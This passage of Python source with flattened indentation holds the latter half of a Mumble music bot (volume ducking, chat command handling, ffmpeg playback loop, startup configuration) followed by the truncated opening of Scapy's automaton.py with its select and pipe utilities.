_volume = var.config.getfloat('bot', 'volume', fallback=0.8)
if var.db.has_option('bot', 'volume'):
_volume = var.db.getfloat('bot', 'volume')
self.volume_helper.set_volume(_volume)
self.is_ducking = False
self.on_ducking = False
self.ducking_release = time.time()
self.last_volume_cycle_time = time.time()
self._ducking_volume = 0
_ducking_volume = var.config.getfloat("bot", "ducking_volume", fallback=0.50)
_ducking_volume = var.db.getfloat("bot", "ducking_volume", fallback=_ducking_volume)
self.volume_helper.set_ducking_volume(_ducking_volume)
self.ducking_threshold = var.config.getfloat("bot", "ducking_threshold", fallback=5000)
self.ducking_threshold = var.db.getfloat("bot", "ducking_threshold", fallback=self.ducking_threshold)
if not var.db.has_option("bot", "ducking") and var.config.getboolean("bot", "ducking", fallback=False) \
or var.config.getboolean("bot", "ducking"):
self.is_ducking = True
self.mumble.callbacks.set_callback(pymumble.constants.PYMUMBLE_CLBK_SOUNDRECEIVED,
self.ducking_sound_received)
self.mumble.set_receive_sound(True)
assert var.config.get("bot", "when_nobody_in_channel") in ['pause', 'pause_resume', 'stop', 'nothing', ''], \
"Unknown action for when_nobody_in_channel"
if var.config.get("bot", "when_nobody_in_channel", fallback='') in ['pause', 'pause_resume', 'stop']:
user_change_callback = \
lambda user, action: threading.Thread(target=self.users_changed,
args=(user, action), daemon=True).start()
self.mumble.callbacks.set_callback(pymumble.constants.PYMUMBLE_CLBK_USERREMOVED, user_change_callback)
self.mumble.callbacks.set_callback(pymumble.constants.PYMUMBLE_CLBK_USERUPDATED, user_change_callback)
# Debug use
self._loop_status = 'Idle'
self._display_rms = False
self._max_rms = 0
self.redirect_ffmpeg_log = var.config.getboolean('debug', 'redirect_ffmpeg_log', fallback=True)
if var.config.getboolean("bot", "auto_check_update"):
def check_update():
nonlocal self
new_version, changelog = util.check_update(self.get_version())
if new_version:
self.send_channel_msg(tr('new_version_found', new_version=new_version, changelog=changelog))
th = threading.Thread(target=check_update, name="UpdateThread")
th.daemon = True
th.start()
last_startup_version = var.db.get("bot", "version", fallback=None)
if not last_startup_version or version.parse(last_startup_version) < version.parse(self.version):
var.db.set("bot", "version", self.version)
if var.config.getboolean("bot", "auto_check_update"):
changelog = util.fetch_changelog()
self.send_channel_msg(tr("update_successful", version=self.version, changelog=changelog))
# Set the CTRL+C shortcut
def ctrl_caught(self, signal, frame):
self.log.info(
"\nSIGINT caught, quitting, {} more to kill".format(2 - self.nb_exit))
if var.config.getboolean('bot', 'save_playlist', fallback=True) \
and var.config.get("bot", "save_music_library", fallback=True):
self.log.info("bot: save playlist into database")
var.playlist.save()
if self.nb_exit > 1:
self.log.info("Forced Quit")
sys.exit(0)
self.nb_exit += 1
self.exit = True
def get_version(self):
if self.version != "git":
return self.version
else:
return util.get_snapshot_version()
def register_command(self, cmd, handle, no_partial_match=False, access_outside_channel=False, admin=False):
cmds = cmd.split(",")
for command in cmds:
command = command.strip()
if command:
self.cmd_handle[command] = {'handle': handle,
'partial_match': not no_partial_match,
'access_outside_channel': access_outside_channel,
'admin': admin}
self.log.debug("bot: command added: " + command)
def set_comment(self):
self.mumble.users.myself.comment(var.config.get('bot', 'comment'))
def join_channel(self):
if self.channel:
if '/' in self.channel:
self.mumble.channels.find_by_tree(self.channel.split('/')).move_in()
else:
self.mumble.channels.find_by_name(self.channel).move_in()
# =======================
# Message
# =======================
# All text send to the chat is analysed by this function
def message_received(self, text):
raw_message = text.message.strip()
message = re.sub(r'<.*?>', '', raw_message)
if text.actor == 0:
            # Some servers send a welcome message to the bot once connected.
            # It doesn't have a valid "actor"; simply ignore it here.
return
user = self.mumble.users[text.actor]['name']
if var.config.getboolean('commands', 'split_username_at_space'):
            # in case you use https://github.com/Natenom/mumblemoderator-module-collection/tree/master/os-suffixes ,
            # you may want to split the username
user = user.split()[0]
command_symbols = var.config.get('commands', 'command_symbol')
match = re.match(fr'^[{re.escape(command_symbols)}](?P<command>\S+)(?:\s(?P<argument>.*))?', message)
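        # e.g. with command symbol "!", the message "!play some song" yields command="play" and argument="some song"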
if match:
command = match.group("command").lower()
argument = match.group("argument") or ""
if not command:
return
self.log.info(f'bot: received command "{command}" with arguments "{argument}" from {user}')
            # Guard checks: reject disallowed private messages, banned users and banned URLs
if not self.is_admin(user) and not var.config.getboolean('bot', 'allow_private_message') and text.session:
self.mumble.users[text.actor].send_text_message(
tr('pm_not_allowed'))
return
for i in var.db.items("user_ban"):
if user.lower() == i[0]:
self.mumble.users[text.actor].send_text_message(
tr('user_ban'))
return
if not self.is_admin(user) and argument:
input_url = util.get_url_from_input(argument)
if input_url and var.db.has_option('url_ban', input_url):
self.mumble.users[text.actor].send_text_message(
tr('url_ban'))
return
command_exc = ""
try:
if command in self.cmd_handle:
command_exc = command
else:
# try partial match
cmds = self.cmd_handle.keys()
matches = []
for cmd in cmds:
if cmd.startswith(command) and self.cmd_handle[cmd]['partial_match']:
matches.append(cmd)
if len(matches) == 1:
self.log.info("bot: {:s} matches {:s}".format(command, matches[0]))
command_exc = matches[0]
elif len(matches) > 1:
self.mumble.users[text.actor].send_text_message(
tr('which_command', commands="<br>".join(matches)))
return
else:
self.mumble.users[text.actor].send_text_message(
tr('bad_command', command=command))
return
if self.cmd_handle[command_exc]['admin'] and not self.is_admin(user):
self.mumble.users[text.actor].send_text_message(tr('not_admin'))
return
if not self.cmd_handle[command_exc]['access_outside_channel'] \
and not self.is_admin(user) \
and not var.config.getboolean('bot', 'allow_other_channel_message') \
and self.mumble.users[text.actor]['channel_id'] != self.mumble.users.myself['channel_id']:
self.mumble.users[text.actor].send_text_message(
tr('not_in_my_channel'))
return
self.cmd_handle[command_exc]['handle'](self, user, text, command_exc, argument)
except:
error_traceback = traceback.format_exc()
error = error_traceback.rstrip().split("\n")[-1]
self.log.error(f"bot: command {command_exc} failed with error: {error_traceback}\n")
self.send_msg(tr('error_executing_command', command=command_exc, error=error), text)
def send_msg(self, msg, text):
msg = msg.encode('utf-8', 'ignore').decode('utf-8')
        # text is the message object; it tells whether this was a direct or a channel message
self.mumble.users[text.actor].send_text_message(msg)
def send_channel_msg(self, msg):
msg = msg.encode('utf-8', 'ignore').decode('utf-8')
own_channel = self.mumble.channels[self.mumble.users.myself['channel_id']]
own_channel.send_text_message(msg)
@staticmethod
def is_admin(user):
list_admin = var.config.get('bot', 'admin').rstrip().split(';')
if user in list_admin:
return True
else:
return False
# =======================
# Other Mumble Events
# =======================
def get_user_count_in_channel(self):
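        # Count distinct user names in the bot's channel (the bot itself included), excluding names listed as other bots.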
own_channel = self.mumble.channels[self.mumble.users.myself['channel_id']]
return len(set([user.get_property("name") for user in own_channel.get_users()]).difference(self.bots))
def users_changed(self, user, message):
        # only react when exactly one more user has just joined the channel;
        # otherwise, whenever the music is paused and somebody joins, it would start playing again
user_count = self.get_user_count_in_channel()
if user_count > self._user_in_channel and user_count == 2:
if var.config.get("bot", "when_nobody_in_channel") == "pause_resume":
self.resume()
elif var.config.get("bot", "when_nobody_in_channel") == "pause" and self.is_pause:
self.send_channel_msg(tr("auto_paused"))
elif user_count == 1 and len(var.playlist) != 0:
# if the bot is the only user left in the channel and the playlist isn't empty
if var.config.get("bot", "when_nobody_in_channel") == "stop":
self.log.info('bot: No user in my channel. Stop music now.')
self.clear()
else:
self.log.info('bot: No user in my channel. Pause music now.')
self.pause()
self._user_in_channel = user_count
# =======================
# Launch and Download
# =======================
def launch_music(self, music_wrapper, start_from=0):
assert music_wrapper.is_ready()
uri = music_wrapper.uri()
self.log.info("bot: play music " + music_wrapper.format_debug_string())
if var.config.getboolean('bot', 'announce_current_music'):
self.send_channel_msg(music_wrapper.format_current_playing())
if var.config.getboolean('debug', 'ffmpeg'):
ffmpeg_debug = "debug"
else:
ffmpeg_debug = "warning"
channels = 2 if self.stereo else 1
self.pcm_buffer_size = 960 * channels
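        # 960 bytes per channel is 10 ms of signed 16-bit PCM at 48 kHz (480 samples x 2 bytes); loop() reads ffmpeg's output in chunks of this size.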
command = ("ffmpeg", '-v', ffmpeg_debug, '-nostdin', '-i',
uri, '-ss', f"{start_from:f}", '-ac', str(channels), '-f', 's16le', '-ar', '48000', '-')
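        # ffmpeg decodes the uri from start_from seconds onward and writes raw s16le PCM at 48 kHz to stdout.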
self.log.debug("bot: execute ffmpeg command: " + " ".join(command))
        # The ffmpeg process is stored in self.thread (despite the name, it is a subprocess, not a Python thread)
# prepare pipe for catching stderr of ffmpeg
if self.redirect_ffmpeg_log:
pipe_rd, pipe_wd = util.pipe_no_wait() # Let the pipe work in non-blocking mode
self.thread_stderr = os.fdopen(pipe_rd)
else:
pipe_rd, pipe_wd = None, None
self.thread = sp.Popen(command, stdout=sp.PIPE, stderr=pipe_wd, bufsize=self.pcm_buffer_size)
def async_download_next(self):
        # Started when the next track isn't ready yet;
        # does nothing if the next track is already downloaded
self.log.debug("bot: Async download next asked ")
while var.playlist.next_item():
            # usually, all validation is done when an item is added to the list.
            # however, for performance reasons, items from a youtube playlist aren't validated when added,
            # so the validation has to be done here.
next = var.playlist.next_item()
try:
if not next.is_ready():
self.async_download(next)
break
except ValidationFailedError as e:
self.send_channel_msg(e.msg)
var.playlist.remove_by_id(next.id)
var.cache.free_and_delete(next.id)
def async_download(self, item):
th = threading.Thread(
target=self._download, name="Prepare-" + item.id[:7], args=(item,))
self.log.info(f"bot: start preparing item in thread: {item.format_debug_string()}")
th.daemon = True
th.start()
return th
def start_download(self, item):
if not item.is_ready():
self.log.info("bot: current music isn't ready, start downloading.")
self.async_download(item)
self.send_channel_msg(
tr('download_in_progress', item=item.format_title()))
def _download(self, item):
ver = item.version
try:
item.validate()
if item.is_ready():
return True
except ValidationFailedError as e:
self.send_channel_msg(e.msg)
var.playlist.remove_by_id(item.id)
var.cache.free_and_delete(item.id)
return False
try:
item.prepare()
if item.version > ver:
var.playlist.version += 1
return True
except PreparationFailedError as e:
self.send_channel_msg(e.msg)
return False
# =======================
# Loop
# =======================
# Main loop of the Bot
def loop(self):
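        # Each iteration: wait until mumble's output buffer has room, read one PCM chunk from ffmpeg,
        # apply volume/fades and queue it; once ffmpeg is done, advance the playlist and prepare the next track.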
while not self.exit and self.mumble.is_alive():
while self.thread and self.mumble.sound_output.get_buffer_size() > 0.5 and not self.exit:
                # If the buffer isn't empty, I cannot send a new chunk of music yet, so I wait
self._loop_status = f'Wait for buffer {self.mumble.sound_output.get_buffer_size():.3f}'
time.sleep(0.01)
raw_music = None
if self.thread:
                # I get raw PCM from the ffmpeg thread
# move playhead forward
self._loop_status = 'Reading raw'
if self.song_start_at == -1:
self.song_start_at = time.time() - self.playhead
self.playhead = time.time() - self.song_start_at
raw_music = self.thread.stdout.read(self.pcm_buffer_size)
self.read_pcm_size += len(raw_music)
if self.redirect_ffmpeg_log:
try:
self.last_ffmpeg_err = self.thread_stderr.readline()
if self.last_ffmpeg_err:
self.log.debug("ffmpeg: " + self.last_ffmpeg_err.strip("\n"))
except:
pass
if raw_music:
# Adjust the volume and send it to mumble
self.volume_cycle()
if not self.on_interrupting and len(raw_music) == self.pcm_buffer_size:
self.mumble.sound_output.add_sound(
audioop.mul(raw_music, 2, self.volume_helper.real_volume))
elif self.read_pcm_size == 0:
self.mumble.sound_output.add_sound(
audioop.mul(self._fadeout(raw_music, self.stereo, fadein=True), 2, self.volume_helper.real_volume))
elif self.on_interrupting or len(raw_music) < self.pcm_buffer_size:
self.mumble.sound_output.add_sound(
audioop.mul(self._fadeout(raw_music, self.stereo, fadein=False), 2, self.volume_helper.real_volume))
self.thread.kill()
self.thread = None
time.sleep(0.1)
self.on_interrupting = False
else:
time.sleep(0.1)
else:
time.sleep(0.1)
if not self.is_pause and not raw_music:
self.thread = None
                # the bot is not paused, but the ffmpeg thread has gone.
                # this indicates the last song has finished, the bot just resumed from pause, or something is wrong.
if self.read_pcm_size < self.pcm_buffer_size \
and var.playlist.current_index != -1 \
and self.last_ffmpeg_err:
current = var.playlist.current_item()
self.log.error("bot: cannot play music %s", current.format_debug_string())
self.log.error("bot: with ffmpeg error: %s", self.last_ffmpeg_err)
self.last_ffmpeg_err = ""
self.send_channel_msg(tr('unable_play', item=current.format_title()))
var.playlist.remove_by_id(current.id)
var.cache.free_and_delete(current.id)
# move to the next song.
if not self.wait_for_ready: # if wait_for_ready flag is not true, move to the next song.
if var.playlist.next():
current = var.playlist.current_item()
self.log.debug(f"bot: next into the song: {current.format_debug_string()}")
try:
self.start_download(current)
self.wait_for_ready = True
self.song_start_at = -1
self.playhead = 0
except ValidationFailedError as e:
self.send_channel_msg(e.msg)
var.playlist.remove_by_id(current.id)
var.cache.free_and_delete(current.id)
else:
self._loop_status = 'Empty queue'
else:
                    # if the wait_for_ready flag is true, the pointer already
                    # points to the target song. start playing
current = var.playlist.current_item()
if current:
if current.is_ready():
self.wait_for_ready = False
self.read_pcm_size = 0
self.launch_music(current, self.playhead)
self.last_volume_cycle_time = time.time()
self.async_download_next()
elif current.is_failed():
var.playlist.remove_by_id(current.id)
self.wait_for_ready = False
else:
self._loop_status = 'Wait for the next item to be ready'
else:
self.wait_for_ready = False
while self.mumble.sound_output.get_buffer_size() > 0 and self.mumble.is_alive():
# Empty the buffer before exit
time.sleep(0.01)
time.sleep(0.5)
if self.exit:
self._loop_status = "exited"
if var.config.getboolean('bot', 'save_playlist', fallback=True) \
and var.config.get("bot", "save_music_library", fallback=True):
self.log.info("bot: save playlist into database")
var.playlist.save()
def volume_cycle(self):
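        # Move real_volume towards its target with a first-order exponential response:
        # roughly a 0.2 s time constant while ducking down, 0.5 s when recovering.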
delta = time.time() - self.last_volume_cycle_time
if self.on_ducking and self.ducking_release < time.time():
self.on_ducking = False
self._max_rms = 0
if delta > 0.001:
if self.is_ducking and self.on_ducking:
self.volume_helper.real_volume = \
(self.volume_helper.real_volume - self.volume_helper.ducking_volume_set) * math.exp(- delta / 0.2) \
+ self.volume_helper.ducking_volume_set
else:
self.volume_helper.real_volume = self.volume_helper.volume_set - \
(self.volume_helper.volume_set - self.volume_helper.real_volume) * math.exp(- delta / 0.5)
self.last_volume_cycle_time = time.time()
def ducking_sound_received(self, user, sound):
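        # Sound-received callback: compute the RMS level of the incoming voice packet and trigger ducking when it exceeds ducking_threshold.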
rms = audioop.rms(sound.pcm, 2)
self._max_rms = max(rms, self._max_rms)
if self._display_rms:
if rms < self.ducking_threshold:
print('%6d/%6d ' % (rms, self._max_rms) + '-' * int(rms / 200), end='\r')
else:
print('%6d/%6d ' % (rms, self._max_rms) + '-' * int(self.ducking_threshold / 200)
+ '+' * int((rms - self.ducking_threshold) / 200), end='\r')
if rms > self.ducking_threshold:
if self.on_ducking is False:
self.log.debug("bot: ducking triggered")
self.on_ducking = True
self.ducking_release = time.time() + 1 # ducking release after 1s
def _fadeout(self, _pcm_data, stereo=False, fadein=False):
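        # Apply an exponential fade (fade-out by default, fade-in when fadein=True) to raw signed 16-bit PCM,
        # sample by sample, then append an equal length of silence.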
pcm_data = bytearray(_pcm_data)
if stereo:
if not fadein:
mask = [math.exp(-x / 60) for x in range(0, int(len(pcm_data) / 4))]
else:
mask = [math.exp(-x / 60) for x in reversed(range(0, int(len(pcm_data) / 4)))]
for i in range(int(len(pcm_data) / 4)):
pcm_data[4 * i:4 * i + 2] = struct.pack("<h",
round(struct.unpack("<h", pcm_data[4 * i:4 * i + 2])[0] * mask[i]))
pcm_data[4 * i + 2:4 * i + 4] = struct.pack("<h", round(
struct.unpack("<h", pcm_data[4 * i + 2:4 * i + 4])[0] * mask[i]))
else:
mask = [math.exp(-x / 60) for x in range(0, int(len(pcm_data) / 2))]
for i in range(int(len(pcm_data) / 2)):
pcm_data[2 * i:2 * i + 2] = struct.pack("<h",
round(struct.unpack("<h", pcm_data[2 * i:2 * i + 2])[0] * mask[i]))
return bytes(pcm_data) + bytes(len(pcm_data))
# =======================
# Play Control
# =======================
def play(self, index=-1, start_at=0):
if not self.is_pause:
self.interrupt()
if index != -1:
var.playlist.point_to(index)
current = var.playlist.current_item()
self.start_download(current)
self.is_pause = False
self.wait_for_ready = True
self.song_start_at = -1
self.playhead = start_at
def clear(self):
# Kill the ffmpeg thread and empty the playlist
self.interrupt()
var.playlist.clear()
self.wait_for_ready = False
self.log.info("bot: music stopped. playlist trashed.")
def stop(self):
self.interrupt()
self.is_pause = True
if len(var.playlist) > 0:
self.wait_for_ready = True
else:
self.wait_for_ready = False
self.log.info("bot: music stopped.")
def interrupt(self):
# Kill the ffmpeg thread
if self.thread:
self.on_interrupting = True
time.sleep(0.1)
self.song_start_at = -1
self.read_pcm_size = 0
def pause(self):
# Kill the ffmpeg thread
self.interrupt()
self.is_pause = True
self.song_start_at = -1
if len(var.playlist) > 0:
self.pause_at_id = var.playlist.current_item().id
self.log.info(f"bot: music paused at {self.playhead:.2f} seconds.")
def resume(self):
self.is_pause = False
if var.playlist.current_index == -1:
var.playlist.next()
self.playhead = 0
return
music_wrapper = var.playlist.current_item()
if not music_wrapper or not music_wrapper.id == self.pause_at_id or not music_wrapper.is_ready():
self.playhead = 0
return
self.wait_for_ready = True
self.pause_at_id = ""
def start_web_interface(addr, port):
global formatter
import interface
# setup logger
werkzeug_logger = logging.getLogger('werkzeug')
logfile = util.solve_filepath(var.config.get('webinterface', 'web_logfile'))
if logfile:
handler = logging.handlers.RotatingFileHandler(logfile, mode='a', maxBytes=10240) # Rotate after 10KB
else:
handler = logging.StreamHandler()
werkzeug_logger.addHandler(handler)
interface.init_proxy()
interface.web.env = 'development'
interface.web.secret_key = var.config.get('webinterface', 'flask_secret')
interface.web.run(port=port, host=addr)
if __name__ == '__main__':
supported_languages = util.get_supported_language()
parser = argparse.ArgumentParser(
description='Bot for playing music on Mumble')
# General arguments
parser.add_argument("--config", dest='config', type=str, default='configuration.ini',
help='Load configuration from this file. Default: configuration.ini')
parser.add_argument("--db", dest='db', type=str,
default=None, help='Settings database file')
parser.add_argument("--music-db", dest='music_db', type=str,
default=None, help='Music library database file')
parser.add_argument("--lang", dest='lang', type=str, default=None,
help='Preferred language. Support ' + ", ".join(supported_languages))
parser.add_argument("-q", "--quiet", dest="quiet",
action="store_true", help="Only Error logs")
parser.add_argument("-v", "--verbose", dest="verbose",
action="store_true", help="Show debug log")
# Mumble arguments
parser.add_argument("-s", "--server", dest="host",
type=str, help="Hostname of the Mumble server")
parser.add_argument("-u", "--user", dest="user",
type=str, help="Username for the bot")
parser.add_argument("-P", "--password", dest="password",
type=str, help="Server password, if required")
parser.add_argument("-T", "--tokens", dest="tokens",
type=str, help="Server tokens to enter a channel, if required (multiple entries separated with comma ','")
parser.add_argument("-p", "--port", dest="port",
type=int, help="Port for the Mumble server")
parser.add_argument("-c", "--channel", dest="channel",
type=str, help="Default channel for the bot")
parser.add_argument("-C", "--cert", dest="certificate",
type=str, default=None, help="Certificate file")
parser.add_argument("-b", "--bandwidth", dest="bandwidth",
type=int, help="Bandwidth used by the bot")
parser.add_argument("-B", "--bots", dest="bots",
type=str, help="List of usernames belonging to other bots. (multiple entries separated with comma ','")
args = parser.parse_args()
# ======================
# Load Config
# ======================
config = configparser.ConfigParser(interpolation=None, allow_no_value=True)
var.config = config
parsed_configs = config.read([util.solve_filepath('configuration.default.ini'), util.solve_filepath(args.config)],
encoding='utf-8')
if len(parsed_configs) == 0:
logging.error('Could not read configuration from file \"{}\"'.format(args.config))
sys.exit()
# ======================
# Setup Logger
# ======================
bot_logger = logging.getLogger("bot")
bot_logger.setLevel(logging.INFO)
if args.verbose:
bot_logger.setLevel(logging.DEBUG)
bot_logger.debug("Starting in DEBUG loglevel")
elif args.quiet:
bot_logger.setLevel(logging.ERROR)
bot_logger.error("Starting in ERROR loglevel")
logfile = util.solve_filepath(var.config.get('bot', 'logfile').strip())
handler = None
if logfile:
print(f"Redirecting stdout and stderr to log file: {logfile}")
handler = logging.handlers.RotatingFileHandler(logfile, mode='a', maxBytes=10240) # Rotate after 10KB
if var.config.getboolean("bot", "redirect_stderr", fallback=False):
sys.stderr = util.LoggerIOWrapper(bot_logger, logging.INFO,
fallback_io_buffer=sys.stderr.buffer)
else:
handler = logging.StreamHandler()
util.set_logging_formatter(handler, bot_logger.level)
bot_logger.addHandler(handler)
logging.getLogger("root").addHandler(handler)
var.bot_logger = bot_logger
# ======================
# Load Database
# ======================
if args.user:
username = args.user
else:
username = var.config.get("bot", "username")
sanitized_username = "".join([x if x.isalnum() else "_" for x in username])
var.settings_db_path = args.db if args.db is not None else util.solve_filepath(
config.get("bot", "database_path", fallback=f"settings-{sanitized_username}.db"))
var.music_db_path = args.music_db if args.music_db is not None else util.solve_filepath(
config.get("bot", "music_database_path", fallback="music.db"))
var.db = SettingsDatabase(var.settings_db_path)
if var.config.get("bot", "save_music_library", fallback=True):
var.music_db = MusicDatabase(var.music_db_path)
else:
var.music_db = MusicDatabase(":memory:")
DatabaseMigration(var.db, var.music_db).migrate()
var.music_folder = util.solve_filepath(var.config.get('bot', 'music_folder'))
if not var.music_folder.endswith(os.sep):
# The file searching logic assumes that the music folder ends in a /
var.music_folder = var.music_folder + os.sep
var.tmp_folder = util.solve_filepath(var.config.get('bot', 'tmp_folder'))
# ======================
# Translation
# ======================
lang = ""
if args.lang:
lang = args.lang
else:
lang = var.config.get('bot', 'language', fallback='en_US')
if lang not in supported_languages:
raise KeyError(f"Unsupported language {lang}")
var.language = lang
constants.load_lang(lang)
# ======================
# Prepare Cache
# ======================
var.cache = MusicCache(var.music_db)
if var.config.getboolean("bot", "refresh_cache_on_startup", fallback=True):
var.cache.build_dir_cache()
# ======================
# Load playback mode
# ======================
playback_mode = None
if var.db.has_option("playlist", "playback_mode"):
playback_mode = var.db.get('playlist', 'playback_mode')
else:
playback_mode = var.config.get('bot', 'playback_mode', fallback="one-shot")
if playback_mode in ["one-shot", "repeat", "random", "autoplay"]:
var.playlist = media.playlist.get_playlist(playback_mode)
else:
raise KeyError(f"Unknown playback mode '{playback_mode}'")
# ======================
# Create bot instance
# ======================
var.bot = MumbleBot(args)
command.register_all_commands(var.bot)
# load playlist
if var.config.getboolean('bot', 'save_playlist', fallback=True):
var.bot_logger.info("bot: load playlist from previous session")
var.playlist.load()
# ============================
# Start the web interface
# ============================
if var.config.getboolean("webinterface", "enabled"):
wi_addr = var.config.get("webinterface", "listening_addr")
wi_port = var.config.getint("webinterface", "listening_port")
tt = threading.Thread(
target=start_web_interface, name="WebThread", args=(wi_addr, wi_port))
tt.daemon = True
bot_logger.info('Starting web interface on {}:{}'.format(wi_addr, wi_port))
tt.start()
# Start the main loop.
var.bot.loop()
|
automaton.py
|
# This file is part of Scapy
# See http://www.secdev.org/projects/scapy for more information
# Copyright (C) Philippe Biondi <phil@secdev.org>
# Copyright (C) Gabriel Potter <gabriel@potter.fr>
# This program is published under a GPLv2 license
"""
Automata with states, transitions and actions.
"""
from __future__ import absolute_import
import types
import itertools
import time
import os
import sys
import traceback
from select import select
from collections import deque
import threading
from scapy.config import conf
from scapy.utils import do_graph
from scapy.error import log_interactive, warning
from scapy.plist import PacketList
from scapy.data import MTU
from scapy.supersocket import SuperSocket
from scapy.consts import WINDOWS
import scapy.modules.six as six
if WINDOWS:
from scapy.error import Scapy_Exception
recv_error = Scapy_Exception
else:
recv_error = ()
""" In Windows, select.select is not available for custom objects. Here's the implementation of scapy to re-create this functionality # noqa: E501
# Passive way: using no-ressources locks
+---------+ +---------------+ +-------------------------+ # noqa: E501
| Start +------------->Select_objects +----->+Linux: call select.select| # noqa: E501
+---------+ |(select.select)| +-------------------------+ # noqa: E501
+-------+-------+
|
+----v----+ +--------+
| Windows | |Time Out+----------------------------------+ # noqa: E501
+----+----+ +----+---+ | # noqa: E501
| ^ | # noqa: E501
Event | | | # noqa: E501
+ | | | # noqa: E501
| +-------v-------+ | | # noqa: E501
| +------+Selectable Sel.+-----+-----------------+-----------+ | # noqa: E501
| | +-------+-------+ | | | v +-----v-----+ # noqa: E501
+-------v----------+ | | | | | Passive lock<-----+release_all<------+ # noqa: E501
|Data added to list| +----v-----+ +-----v-----+ +----v-----+ v v + +-----------+ | # noqa: E501
+--------+---------+ |Selectable| |Selectable | |Selectable| ............ | | # noqa: E501
| +----+-----+ +-----------+ +----------+ | | # noqa: E501
| v | | # noqa: E501
v +----+------+ +------------------+ +-------------v-------------------+ | # noqa: E501
+-----+------+ |wait_return+-->+ check_recv: | | | | # noqa: E501
|call_release| +----+------+ |If data is in list| | END state: selectable returned | +---+--------+ # noqa: E501
+-----+-------- v +-------+----------+ | | | exit door | # noqa: E501
| else | +---------------------------------+ +---+--------+ # noqa: E501
| + | | # noqa: E501
| +----v-------+ | | # noqa: E501
+--------->free -->Passive lock| | | # noqa: E501
+----+-------+ | | # noqa: E501
| | | # noqa: E501
| v | # noqa: E501
+------------------Selectable-Selector-is-advertised-that-the-selectable-is-readable---------+
"""
class SelectableObject(object):
"""DEV: to implement one of those, you need to add 2 things to your object:
- add "check_recv" function
- call "self.call_release" once you are ready to be read
You can set the __selectable_force_select__ to True in the class, if you want to # noqa: E501
force the handler to use fileno(). This may only be usable on sockets created using # noqa: E501
the builtin socket API."""
__selectable_force_select__ = False
def __init__(self):
self.hooks = []
def check_recv(self):
"""DEV: will be called only once (at beginning) to check if the object is ready.""" # noqa: E501
raise OSError("This method must be overwritten.")
def _wait_non_ressources(self, callback):
"""This get started as a thread, and waits for the data lock to be freed then advertise itself to the SelectableSelector using the callback""" # noqa: E501
self.trigger = threading.Lock()
self.was_ended = False
self.trigger.acquire()
self.trigger.acquire()
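        # The lock is already held, so this second acquire() blocks until call_release() frees it (or the selector aborts).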
if not self.was_ended:
callback(self)
def wait_return(self, callback):
"""Entry point of SelectableObject: register the callback"""
if self.check_recv():
return callback(self)
_t = threading.Thread(target=self._wait_non_ressources, args=(callback,)) # noqa: E501
_t.setDaemon(True)
_t.start()
def register_hook(self, hook):
"""DEV: When call_release() will be called, the hook will also"""
self.hooks.append(hook)
def call_release(self, arborted=False):
"""DEV: Must be call when the object becomes ready to read.
Relesases the lock of _wait_non_ressources"""
self.was_ended = arborted
try:
self.trigger.release()
except (threading.ThreadError, AttributeError):
pass
# Trigger hooks
for hook in self.hooks:
hook()
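# A minimal sketch of what the class docstring above describes (illustration only, not part of scapy):
# a custom SelectableObject needs a check_recv() method plus a call to call_release() once data is available.
#
#     class QueueSelectable(SelectableObject):
#         def __init__(self):
#             SelectableObject.__init__(self)
#             self.data = deque()
#         def check_recv(self):
#             return len(self.data) > 0      # ready as soon as something is queued
#         def push(self, item):
#             self.data.append(item)
#             self.call_release()            # wake up any SelectableSelector waiting on us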
class SelectableSelector(object):
"""
Select SelectableObject objects.
inputs: objects to process
remain: timeout. If 0, return [].
customTypes: types of the objects that have the check_recv function.
"""
def _release_all(self):
"""Releases all locks to kill all threads"""
for i in self.inputs:
i.call_release(True)
self.available_lock.release()
def _timeout_thread(self, remain):
"""Timeout before releasing every thing, if nothing was returned"""
time.sleep(remain)
if not self._ended:
self._ended = True
self._release_all()
def _exit_door(self, _input):
"""This function is passed to each SelectableObject as a callback
The SelectableObjects have to call it once there are ready"""
self.results.append(_input)
if self._ended:
return
self._ended = True
self._release_all()
def __init__(self, inputs, remain):
self.results = []
self.inputs = list(inputs)
self.remain = remain
self.available_lock = threading.Lock()
self.available_lock.acquire()
self._ended = False
def process(self):
"""Entry point of SelectableSelector"""
if WINDOWS:
select_inputs = []
for i in self.inputs:
if not isinstance(i, SelectableObject):
warning("Unknown ignored object type: %s", type(i))
elif i.__selectable_force_select__:
# Then use select.select
select_inputs.append(i)
elif not self.remain and i.check_recv():
self.results.append(i)
elif self.remain:
i.wait_return(self._exit_door)
if select_inputs:
# Use default select function
self.results.extend(select(select_inputs, [], [], self.remain)[0]) # noqa: E501
if not self.remain:
return self.results
threading.Thread(target=self._timeout_thread, args=(self.remain,)).start() # noqa: E501
if not self._ended:
self.available_lock.acquire()
return self.results
else:
r, _, _ = select(self.inputs, [], [], self.remain)
return r
def select_objects(inputs, remain):
"""
    Select SelectableObject objects. Same as:
select.select([inputs], [], [], remain)
But also works on Windows, only on SelectableObject.
inputs: objects to process
remain: timeout. If 0, return [].
"""
handler = SelectableSelector(inputs, remain)
return handler.process()
class ObjectPipe(SelectableObject):
read_allowed_exceptions = ()
def __init__(self):
self.closed = False
self.rd, self.wr = os.pipe()
self.queue = deque()
SelectableObject.__init__(self)
def fileno(self):
return self.rd
def check_recv(self):
return len(self.queue) > 0
def send(self, obj):
self.queue.append(obj)
os.write(self.wr, b"X")
self.call_release()
def write(self, obj):
self.send(obj)
def recv(self, n=0):
if self.closed:
if self.check_recv():
return self.queue.popleft()
return None
os.read(self.rd, 1)
return self.queue.popleft()
def read(self, n=0):
return self.recv(n)
def close(self):
if not self.closed:
self.closed = True
os.close(self.rd)
os.close(self.wr)
self.queue.clear()
@staticmethod
def select(sockets, remain=conf.recv_poll_rate):
# Only handle ObjectPipes
results = []
for s in sockets:
if s.closed:
results.append(s)
if results:
return results, None
return select_objects(sockets, remain), None
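# Usage sketch (illustration, not from the original sources): select_objects() mirrors select.select()
# but also works on Windows for SelectableObject instances such as ObjectPipe.
#
#     p1, p2 = ObjectPipe(), ObjectPipe()
#     p2.send("hello")
#     ready = select_objects([p1, p2], 1)    # -> [p2]; p1 has nothing to read
#     for pipe in ready:
#         print(pipe.recv())                 # -> "hello"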
class Message:
def __init__(self, **args):
self.__dict__.update(args)
def __repr__(self):
return "<Message %s>" % " ".join("%s=%r" % (k, v)
for (k, v) in six.iteritems(self.__dict__) # noqa: E501
if not k.startswith("_"))
class _instance_state:
def __init__(self, instance):
self.__self__ = instance.__self__
self.__func__ = instance.__func__
self.__self__.__class__ = instance.__self__.__class__
def __getattr__(self, attr):
return getattr(self.__func__, attr)
def __call__(self, *args, **kargs):
return self.__func__(self.__self__, *args, **kargs)
def breaks(self):
